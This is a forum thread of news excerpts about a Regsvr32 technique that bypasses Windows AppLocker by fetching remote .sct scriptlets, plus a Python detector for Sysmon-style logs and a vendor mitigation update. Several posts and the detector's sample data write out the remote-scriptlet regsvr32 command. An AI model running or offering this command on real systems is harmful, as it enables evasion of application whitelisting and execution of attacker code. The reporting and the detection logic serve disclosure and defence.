Windows AppLocker Bypassed to Execute Remote Scripts

Alkajak

Clever hackers can bypass Microsoft's Windows AppLocker security feature by abusing a hidden trait of the Regsvr32 command-line utility that's normally used to register DLLs on a Windows computer.

AppLocker is a security feature introduced with Windows 7 and Windows Server 2008 R2 that helps administrators specify which users or group of users are allowed to access and run files on a per-file basis.

Regsvr32 is a scripting utility that can be used by installers or in batch scripts to quickly register a DLL. As you'd imagine, Microsoft has neutered such a dangerous tool in order to prevent abuses by allowing it to run only with administrator privileges.

Attacks are impossible to detect

According to security researcher Casey Smith, an attacker that has a foothold on an infected Windows workstation can abuse Regsvr32 to download a COM scriptlet (.sct file) off the Internet and run it to register a DLL on the local machine.

The attacker won't need admin privileges; Regsvr32 is proxy aware, can work with TLS content, follows redirects and, above all, is signed by a Microsoft-issued certificate, making all commands look like normal Windows background activity.

Below are the standard Regsvr32 syntax and a version of a malicious command:

regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname
regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

Regsvr32 feature is not documented

"It's not well documented that regsvr32.exe can accept a URL for a script," Smith also noted. "In order to trigger this bypass, place the code block, either VB or JS inside the <registration> element."

For further tests, the researcher has also published four proof-of-concept scripts on GitHub that sysadmins can load via Regsvr32 and open a backdoor or a reverse shell over HTTP.

In theory, these kinds of exploits would allow a hacker access to register DLLs and then execute malicious code on the compromised machines, even with admin privileges.
 

echo1

A core Windows command-line utility, Regsvr32, used to register DLLs to the Windows Registry can be abused to run remote code from the Internet, bypassing whitelisting protections such as Microsoft’s AppLocker.

A researcher who requested anonymity found and privately disclosed the issue to Microsoft on Tuesday. It’s unknown whether Microsoft will patch this issue with a security bulletin, or in a future release.

Regsvr32, also known as Microsoft Register Server, is a Microsoft-signed binary that runs as default on Windows. The researcher’s proof-of-concept allows him to download and run JavaScript or VBScript from a URL provided via the command line. Abusing this situation presumes an attacker would already be present on the box, the researcher said.

“A lot of whitelisting protections block JavaScript or VBScript; there’s no restriction here,” the researcher told Threatpost. “The fact that the code is hosted on a remote system makes it trivial. And Regsvr32 is proxy- and SSL-aware, meaning there’s no extra configuration needed. You can execute from any remote destination.”

The researcher said the issue was discovered while researching AppLocker bypasses.

“There’s really no patch for this; it’s not an exploit. It’s just using the tool in an unorthodox manner. It’s a bypass, an evasion tactic,” the researcher said. “The feedback I got from Microsoft is that there’s not going to be a patch. That may change, I don’t know.”

Complicating matters is that Regsvr32 normally requires admin privileges to run in order to be able to register COM (component object model) objects and DLLs on the operating system.

“Only admins normally run this. In this case, I can run it as a normal user,” the researcher said. “I could call unregistered methods and execute them as a normal user.”

Documentation on Regsvr32 does not indicate that it would accept scripts from the Internet. Recent so-called fileless malware attacks have used Windows PowerShell to download malware from the Internet, and it appears this issue could be abused in a similar way.

The researcher said that attacks using this method would be tough to detect.

“There are not many artifacts left on the box to indicate it ran,” the researcher said, adding that a command line auditing tool such as SysMon would log that someone ran Regsvr32 with a URL in the parameter. “Because the file is downloaded from a URL, there would be a minimal footprint. I’m not sure there would be much left on the system to indicate it ran.”
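The researcher's remark that a command-line auditing tool such as Sysmon would still log Regsvr32 being run with a URL in its parameters is the basis for this added detection example; it is not code from the thread or from any of the quoted articles. It walks constructed Sysmon-style process-creation records (the field names and every command line are assumed sample data) and flags the invocation pattern the thread describes: a `/i:` argument that is a URL, `scrobj.dll` as the target, and the `/n /u` switch pair.

```python
import re
import shlex

# Constructed sample process-creation records in the shape of Sysmon Event ID 1
# (Image + CommandLine). These are not real telemetry; field names are assumed.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll"},
    {"Image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "CommandLine": r'"C:\Windows\SysWOW64\regsvr32.exe" /S /I:https://example.invalid/a.sct SCROBJ.DLL'},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r'regsvr32 /s "C:\Program Files\Vendor\vendor.dll"'},  # ordinary DLL registration
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec /i setup.msi /qn"},
]

# /i:<value> where the value is a URL rather than a local path; switches are case-insensitive.
URL_RE = re.compile(r"^/i:(https?|ftp)://", re.IGNORECASE)


def basename(path):
    """Last path component of a Windows path, lower-cased (quotes left to the caller)."""
    return path.lower().rsplit("\\", 1)[-1]


def analyse(event):
    """Return the list of indicators found in one process-creation event (empty if none)."""
    if basename(event["Image"]) != "regsvr32.exe":
        return []
    # posix=False keeps Windows quoting intact and does not treat backslashes as escapes.
    args = shlex.split(event["CommandLine"], posix=False)
    indicators = []
    for arg in args:
        if URL_RE.match(arg):
            indicators.append("remote-scriptlet-url")   # script pulled from the network
        if basename(arg) == "scrobj.dll":
            indicators.append("scrobj.dll")             # the scriptlet COM host named in the thread
    switches = {a.lower() for a in args if a.startswith("/")}
    if "/n" in switches and "/u" in switches:
        indicators.append("/n /u combination")          # the switch pair used by the quoted command
    return indicators


def triage(events):
    """Return [(command_line, indicators)] for every event that carries at least one indicator."""
    return [(ev["CommandLine"], analyse(ev)) for ev in events if analyse(ev)]


if __name__ == "__main__":
    for cmd, ind in triage(SAMPLE_EVENTS):
        print(f"{', '.join(ind):45} {cmd}")
```

A plain `/s` registration of a local DLL produces no indicators, so the rule does not fire on routine installer activity.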
 

frogboy

Microsoft’s Windows AppLocker, a feature introduced in Windows 7 to specify which users can run apps within an organization, can be bypassed to execute remote scripts on a machine, a researcher says.

When AppLocker was introduced in Windows 7 and Windows Server 2008 R2, Microsoft provided administrators with the ability to set rules to allow or deny applications from running. These rules could be enforced for specific users or groups and could be used for executable files (.exe and .com), scripts (.js, .ps1, .vbs, .cmd, and .bat), Windows Installer files (.msi and .msp), and DLL files (.dll and .ocx).

In order to successfully bypass Windows AppLocker, an attacker needs to already have a foothold on the target machine, and also has to abuse Regsvr32, a command-line utility designed for registering DLLs in the registry, security researcher Casey Smith explains.

The researcher was looking for a way to register a script to bypass AppLocker, and discovered that the best way to do so is to place the script block inside of the Registration tag and then to call Regsvr32 to have the code executed. Moreover, Smith discovered that the code in the registration element executes on register and unregister.

Abusing Regsvr32 to execute the script comes with a series of benefits, as the command-line tool is proxy aware, uses TLS, follows redirects, and can also be set to run silently and to not display any message boxes.

“So, all you need to do is host your .sct file at a location you control. From the target, simply execute regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll. It’s not well documented that Regsvr32 can accept a URL for a script. In order to trigger this bypass, place the code block, either VB or JS inside the <registration> element,” the researcher explains.

Full Article. Windows AppLocker Bypassed to Execute Remote Scripts | SecurityWeek.Com
 

kev216

The Windows command line utility Regsvr32.exe can be exploited to bypass Microsoft Windows AppLocker protection systems, potentially leading to remote code execution.

The security flaw can be used to circumvent the app whitelist protections offered by AppLocker on business editions of Windows, versions 7 and beyond, by using the command line utility to point to a file or location controlled by an attacker.

As a result, files and scripts can be used to run an app on a Windows system.

Security researcher Casey Smith, also known as "subTee," says the security flaw can be exploited without admin rights or privileged access.

In a blog post, the researcher said that COM+ scripts -- XML documents which register COM objects for use in a PC's internal system -- can be created to bypass AppLocker, and it only takes a script block and deregistering the script to remove the need for admin rights.

In addition, the exploit does not require any tampering which leaves any tracks, a bonus for attackers attempting to hide their activities.

COM+ scripts, otherwise known as .SCT files, are not limited to local access, and so Smith was able to pull up scripts remotely. As the command line utility is also proxy and network aware, an intruder could cause havoc in a system once a PC is compromised.

"All you need to do is host your .SCT file at a location you control," the researcher said. "It's not well documented that Regsvr32.exe can accept a URL for a script. In order to trigger this bypass, place the code block, either VB or JS inside the <registration> element."


A proof-of-concept (PoC) code is available on GitHub.

There is currently no patch for the security flaw. In the meantime, however, you can block Regsvr32.exe with Windows Firewall to mitigate the problem.

At the moment there is no official response from Microsoft yet.
 

Solarquest

HitmanPro.Alert just got an update to fix this.
Great job!
HitmanPro.ALERT Support and Discussion Thread

"HitmanPro.Alert 3.1.9 Build 367 Released

Changelog
  • Fixed ROP false positive in Microsoft Office (occurs on some computers).
  • Added mitigation to prevent regsvr32.exe abuse via COM scriptlets.
  • Improved Skype detection in software radar.
  • Improved short filename (8.3) handling in software radar.
Download
http://dl.surfright.nl/hmpalert3.exe"


On my system the new version is not compatible with Firefox 46.
Disabling Enforce DEP option worked for me.
 

Petrovic

A security researcher named Casey Smith published an article last week where he detailed how the Windows Regsvr32.exe command could be used to bypass AppLocker restrictions. In this article he described a not commonly known feature where Regsvr32 can execute specially crafted scripts on a remote host using a URL. These scripts are XML files that contain embedded JScript or VBScript scripts that will be executed when Regsvr32 runs the script.

This obviously leads to a whole mess of possibilities where an attacker can do very bad things to your computer as long as they have access to it. Unfortunately, there are many ways for an attacker to gain access to a computer, whether it be through an exploit kit or a vulnerability.

Full Article
 
